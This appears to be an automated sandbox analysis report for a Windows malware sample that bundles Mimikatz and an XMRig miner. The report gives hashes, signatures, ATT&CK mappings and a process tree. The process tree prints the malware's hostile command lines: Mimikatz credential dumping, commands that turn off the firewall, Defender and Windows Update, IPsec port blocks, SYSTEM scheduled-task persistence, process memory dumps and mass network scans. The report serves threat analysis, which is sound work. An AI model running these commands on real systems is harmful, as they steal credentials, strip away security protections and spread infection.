Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
-
submitted
02/06/2024, 19:49
General
-
Target
224a3f32b7d2a35233d257df32e141ad43e3be915f30fdec1bdb3507ea967473.exe
-
Size
7.8MB
-
MD5
1b9c6c103616d1d2995ee12e8e02370c
-
SHA1
bb5a412d3cdf8e0ea7f42d56cbd437f1dc075bb7
-
SHA256
224a3f32b7d2a35233d257df32e141ad43e3be915f30fdec1bdb3507ea967473
-
SHA512
6876f45961b1daa01fd2f8f757ece373279d6708d25e94fd3eb98ae4d19ab5d9eecf7ab9c6ba11b54a0455feda6c81170d53d4cf5e03126f7610af68c718cfe7
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (29340) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
-
UPX dump on OEP (original entry point) 41 IoCs
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Sets file execution options in registry 2 TTPs 40 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 37 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\nesaytpkd\pltlgr.exe"C:\Windows\TEMP\nesaytpkd\pltlgr.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\224a3f32b7d2a35233d257df32e141ad43e3be915f30fdec1bdb3507ea967473.exe"C:\Users\Admin\AppData\Local\Temp\224a3f32b7d2a35233d257df32e141ad43e3be915f30fdec1bdb3507ea967473.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ttkvkbmd\imbmiqm.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
-
-
C:\Windows\ttkvkbmd\imbmiqm.exeC:\Windows\ttkvkbmd\imbmiqm.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\ttkvkbmd\imbmiqm.exeC:\Windows\ttkvkbmd\imbmiqm.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tlncbkkly\cgttatica\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\tlncbkkly\cgttatica\wpcap.exeC:\Windows\tlncbkkly\cgttatica\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tlncbkkly\cgttatica\ltyicsvmm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tlncbkkly\cgttatica\Scant.txt2⤵
-
C:\Windows\tlncbkkly\cgttatica\ltyicsvmm.exeC:\Windows\tlncbkkly\cgttatica\ltyicsvmm.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\tlncbkkly\cgttatica\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\tlncbkkly\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\tlncbkkly\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\tlncbkkly\Corporate\vfshost.exeC:\Windows\tlncbkkly\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "kkgiytzip" /ru system /tr "cmd /c C:\Windows\ime\imbmiqm.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "kkgiytzip" /ru system /tr "cmd /c C:\Windows\ime\imbmiqm.exe"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ttbmdbvia" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ttkvkbmd\imbmiqm.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ttbmdbvia" /ru system /tr "cmd /c echo Y|cacls C:\Windows\ttkvkbmd\imbmiqm.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "dmctgkgcm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nesaytpkd\pltlgr.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "dmctgkgcm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\nesaytpkd\pltlgr.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 800 C:\Windows\TEMP\tlncbkkly\800.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 380 C:\Windows\TEMP\tlncbkkly\380.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 2124 C:\Windows\TEMP\tlncbkkly\2124.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 2584 C:\Windows\TEMP\tlncbkkly\2584.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 2780 C:\Windows\TEMP\tlncbkkly\2780.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 2820 C:\Windows\TEMP\tlncbkkly\2820.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 784 C:\Windows\TEMP\tlncbkkly\784.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 3748 C:\Windows\TEMP\tlncbkkly\3748.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 3840 C:\Windows\TEMP\tlncbkkly\3840.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 3908 C:\Windows\TEMP\tlncbkkly\3908.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 4040 C:\Windows\TEMP\tlncbkkly\4040.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 4800 C:\Windows\TEMP\tlncbkkly\4800.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 1908 C:\Windows\TEMP\tlncbkkly\1908.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 1720 C:\Windows\TEMP\tlncbkkly\1720.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 3120 C:\Windows\TEMP\tlncbkkly\3120.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 4552 C:\Windows\TEMP\tlncbkkly\4552.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 4532 C:\Windows\TEMP\tlncbkkly\4532.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\tlncbkkly\hgngmmcem.exeC:\Windows\TEMP\tlncbkkly\hgngmmcem.exe -accepteula -mp 1864 C:\Windows\TEMP\tlncbkkly\1864.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\tlncbkkly\cgttatica\scan.bat2⤵
-
C:\Windows\tlncbkkly\cgttatica\parwdbukn.exeparwdbukn.exe TCP 191.101.0.1 191.101.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\meouau.exeC:\Windows\SysWOW64\meouau.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ttkvkbmd\imbmiqm.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\ttkvkbmd\imbmiqm.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\nesaytpkd\pltlgr.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\nesaytpkd\pltlgr.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\imbmiqm.exe1⤵
-
C:\Windows\ime\imbmiqm.exeC:\Windows\ime\imbmiqm.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\ttkvkbmd\imbmiqm.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\ttkvkbmd\imbmiqm.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\nesaytpkd\pltlgr.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\nesaytpkd\pltlgr.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\imbmiqm.exe1⤵
-
C:\Windows\ime\imbmiqm.exeC:\Windows\ime\imbmiqm.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
8.7MB
MD58bf7c70253d4247cf32d78b3de0749be
SHA1677ffa0c74e56afc0699d39c732479c6919719ed
SHA25638374aa8bad16448254fc8a68076581adb7ea8a316885f34fca0d358e7fde353
SHA51214fd31331ea1409584b10f4b41f1b64f40aa0dceb87f9404d03a3e0a56581776bc29ac1ff8348e00701893d2ea3338fa9f6ac1a877ea70cd6684ad645c4f36c1
-
Filesize
26.1MB
MD5b574ed3d6b9e7b7fa0ff43c9b517413e
SHA16499eeae162b196fd543dd62f23708eda6f46734
SHA256b72bc741883fc51e3a851494dc5bd3906f0e32332567711f23b18e3438efa0a5
SHA512c3319e9032abffd869acebbc18a6a360e21d2dd4011168954ec636e0e6f1aab1e5b31361e8180e702f2c3f213a80727a1d2f56ccba180fdd29940ca69308338e
-
Filesize
4.2MB
MD587460b978c0cf660a447aa0c4942ba35
SHA11241f5836d97453221c2026617176c7f269a0e7e
SHA256e856bea5f1d4261c7368097c6c54f7b7f1d5d467726a159e859e0bd300ee66e7
SHA51244441e174607094436de1b03a53fc42acf510a3ddabf8fee275981d8bda12531e8cd4ef0661bf6fc57ed33c8cf13ba33891c71e1b60ef55f112a7ba72d574cda
-
Filesize
4.1MB
MD586ee2290c834c4cda86dc38fb07363d8
SHA1aa58f96b247ff0fb974c99bf00cd39d45425f507
SHA2564a42da6c1ffb39b93bc4df6b12074913f6a37f23b6aae255a03b2c9486247714
SHA512756c060f9bc7fdfcad730b356b82cb61ef8bddb9546a0f93f9ef08889e0cb9ea07469215f8c0133dc32b7ca17f6ad2885b26b8c2bf1fccc60ec53c670dcbfa65
-
Filesize
7.7MB
MD5ee79e0e52074c2cb2648b7d85191d63f
SHA13671a28c561ffc5e02d9e94fa1dbf5f905de0a32
SHA2560b43854bd4929be386117da33fe2bdad1a81c33fedc4d30a6679d3f0d955ac58
SHA512b7727b018c2af9d5813479e0693224c7c7fee0c2da1870c2820fdaf3275028fe7402a5156a88263a19eba11ee9b6e604ca3fad8bdb15e1e281ed00c0ca1a6c3b
-
Filesize
2.9MB
MD5e0cdbe6ca117674d92613b698312ca58
SHA1fd28b4a643881a14363138f80b1db8d930e75261
SHA25659b889657fc8ecba5f00d3aaa7fa12c20350f5e390b7da88d9389ebd995bfe75
SHA5127f2c142c90530a1f3c7960bf0b2706d3873ca4d91dcb6ed2adf698ccd7424281e9935a80e16723b5d61c9741275f62ca9483977e8218763c3a8263fbb0daea4e
-
Filesize
2.5MB
MD582a4c36e7ae519fcf22f98a2c49eda74
SHA199904c4a525d5a5f47050967abc78fe197ef23e2
SHA2560dc705bd5a581c7e85feb57fe7601deb162eacab3c4cd9abffc328b4801ac979
SHA512227abaeddc2198c280f1fc4a5638526bb9c53fc441c4a593c36c93db2286fb2745549b7209253725cf90ef754d43fdfb9b494a4f36b8b0875270213e165c35b7
-
Filesize
33.6MB
MD59c0cceeed04c00cf763423b630031e93
SHA191e3b47c793d25ff9dcf064de756fd3e9d665ebc
SHA2564cd8d26cbfd7fec4542bf6b1f2ce409e0f156143b9810fc05d96f82c1615d37f
SHA512d101c2637de5e24e390b055c87a0fd186fd4b84f3818ccda51b91393ec874807c5c8ff283bccad3c25eced6d96e72c3520bc9d43934887743cfe5a8306f6ac6e
-
Filesize
20.9MB
MD5c4a96bbf3a50f916ab5c6344ea3bf920
SHA1996472c68f4e8dce0ed2578b13939b62de810550
SHA256b0acfaf1c1a45b6193e422846b945ecc5ce9a7b409e856efce5e1f868910e322
SHA512dadc60bece2ce4d708a8ca09b23cb5fb44d41ee45dbeafdacfbc2874260c2157cbff43b1ab63a624c90e05ecf512b13d14f2a96cca683840ce5ba1ccbf87a493
-
Filesize
8.5MB
MD59d3f4de70860c8db0982f2d392b8eb8d
SHA15bc42bf59400507e749f9376bbc9609b7217c7d3
SHA256543c0d1389bf1c7975c5da325856074e0c02a2765b49fe42ac89336bfbdba749
SHA5124000602597a5a87030e8ee5bcf27b209d647ec3996503e4deb2f9a93db768e4081cf57356c87e56cca3b1cd941d4dfaf203edd0574ec65c4209aede8a4ca5fb2
-
Filesize
43.5MB
MD5ba41d6e600deaffe2f9d2ad1eabd0d0b
SHA151ee2e432e63da3b4c468b5f0f65d469e7213c32
SHA256dfd8b925ec92370e64f7840086cef1e4eca0c9bb7cba98187e59b4bec5c3caa9
SHA51286116c5b0e3559119b0d0509dc70c2b2bef888d7065f2f7d022e59045d936cec828f6f56a364e07e55dda131159102e9da0959c822ba9745db630bdd5e5157db
-
Filesize
1.2MB
MD57058343c82857c36ee41be85f5b44d0e
SHA11ff862a7ee7185a06b28d7d9b409e5fa2f131f2a
SHA2562e8077c29e05481e0ed4e31e86d241a5146f2adc630a92bcf71e9b2e84a429fe
